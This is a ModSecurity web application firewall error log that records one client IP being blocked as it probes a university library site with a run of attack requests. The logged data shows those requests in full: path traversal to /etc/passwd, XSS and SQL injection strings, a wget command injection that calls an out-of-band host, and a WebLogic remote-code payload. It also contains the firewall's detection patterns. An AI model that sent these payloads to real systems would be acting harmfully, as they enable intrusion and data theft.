[Tue Aug 29 11:45:51.435582 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../ found within ARGS:Path: Classes/../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/XMII/Catalog"] [unique_id "ZO13-8Co-f0AAAiv-y4AAAAJ"]
[Tue Aug 29 11:45:56.485676 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZO14BMCo-f0AAAhBSEUAAAAX"]
[Tue Aug 29 11:46:01.368261 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/SolarWinds/InformationService/v3/Json/Query"] [unique_id "ZO14CcCo-f0AAAfSWnsAAAAB"]
[Tue Aug 29 11:46:01.420824 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:where: place\\x22><svg onload=confirm(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/7/0/33/1d/www.citysearch.com/search"] [unique_id "ZO14CcCo-f0AAAhlz@YAAAAi"]
[Tue Aug 29 11:46:02.409699 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/cgiServer.exx"] [unique_id "ZO14CsCo-f0AAAi-Q9sAAAAH"]
[Tue Aug 29 11:46:02.429558 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/InformationService/v3/Json/Query"] [unique_id "ZO14CsCo-f0AAAfbk04AAAAZ"]
[Tue Aug 29 11:46:07.379753 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:state. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:state: $(wget http:/cjmnbitjmimt14dgn26gamaapsqjjgzhc.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/certmngr.cgi"] [unique_id "ZO14D8Co-f0AAAdxUpQAAAAC"]
[Tue Aug 29 11:46:08.429214 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EMCo-f0AAAhZRkwAAAAG"]
[Tue Aug 29 11:46:09.456538 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5QAAAAF"]
[Tue Aug 29 11:46:09.531891 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtjjEAAAAq"]
[Tue Aug 29 11:46:12.456873 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAfEB7cAAAAO"]
[Tue Aug 29 11:46:12.511691 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAi5uEQAAAAS"]
[Tue Aug 29 11:46:13.386930 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAdxUq4AAAAC"]
[Tue Aug 29 11:46:13.396904 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAipS6QAAAAF"]
[Tue Aug 29 11:46:13.484236 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAdxUrMAAAAC"]
[Tue Aug 29 11:46:14.368837 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php/bbs/index/download"] [unique_id "ZO14FsCo-f0AAAi0JKEAAAAK"]
[Tue Aug 29 11:46:14.490535 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/org_execl_download.action"] [unique_id "ZO14FsCo-f0AAAhBSGQAAAAX"]
[Tue Aug 29 11:46:15.594473 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:webpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:webpage: ../../AutoCE.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/IND780/excalweb.dll"] [unique_id "ZO14F8Co-f0AAAdxUr8AAAAC"]
[Tue Aug 29 11:46:18.443488 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14GsCo-f0AAAi2yDEAAAAN"]
[Tue Aug 29 11:46:18.482974 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:country: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cities"] [unique_id "ZO14GsCo-f0AAAi2yDMAAAAN"]
[Tue Aug 29 11:46:19.493596 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"package":";id;#"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within ARGS_NAMES:{\\x22package\\x22:\\x22;id;#\\x22}: {\\x22package\\x22:\\x22;id;#\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php"] [unique_id "ZO14G8Co-f0AAAi5uFEAAAAS"]
[Tue Aug 29 11:46:20.375923 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:QueryText. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  >= `<$ found within ARGS:QueryText: (dInDate >= `<$dateCurrent(-7)$>`)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cs/idcplg"] [unique_id "ZO14HMCo-f0AAAi5uFUAAAAS"]
[Tue Aug 29 11:46:20.385106 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:/etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:/etc/passwd: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/Export_Log"] [unique_id "ZO14HMCo-f0AAAhBSHIAAAAX"]
[Tue Aug 29 11:46:22.469538 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:customerTID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:customerTID: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/supportInstaller"] [unique_id "ZO14HsCo-f0AAAib53MAAAAA"]
[Tue Aug 29 11:46:27.422907 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:f. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:f: /./etc/./passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/img.php"] [unique_id "ZO14I8Co-f0AAAib55IAAAAA"]
[Tue Aug 29 11:46:27.464957 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:working_dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:working_dir: /../../../../../../../../../../etc/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/laravel-filemanager/download"] [unique_id "ZO14I8Co-f0AAAhZRpEAAAAG"]
[Tue Aug 29 11:46:28.504648 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:path: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgit/cgit.cgi/git/objects/"] [unique_id "ZO14JMCo-f0AAAib55oAAAAA"]
[Tue Aug 29 11:46:28.526978 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JMCo-f0AAAi-RCQAAAAH"]
[Tue Aug 29 11:46:29.787075 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/ found within ARGS:style: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c/etc\\x5cpasswd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/webmail/calendar/minimizer/index.php"] [unique_id "ZO14JcCo-f0AAAi0JO0AAAAK"]
[Tue Aug 29 11:46:30.588181 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14JsCo-f0AAAi5uG8AAAAS"]
[Tue Aug 29 11:46:30.830983 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:test_handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:test_handle: com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImp..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO14JsCo-f0AAAi0JPkAAAAK"]
[Tue Aug 29 11:46:31.404105 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/download/index.php"] [unique_id "ZO14J8Co-f0AAAi0JPwAAAAK"]
[Tue Aug 29 11:46:31.973518 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:url: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO14J8Co-f0AAAi5uHwAAAAS"]
[Tue Aug 29 11:46:32.399569 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:picUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../ found within ARGS:picUrl: ./../config/database.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/public/index.php/material/Material/_download_imgage"] [unique_id "ZO14KMCo-f0AAAhl0D4AAAAi"]
[Tue Aug 29 11:46:33.463695 2023] [:error] [pid 2251] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:target: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14KcCo-f0AAAjL8OQAAAAR"]
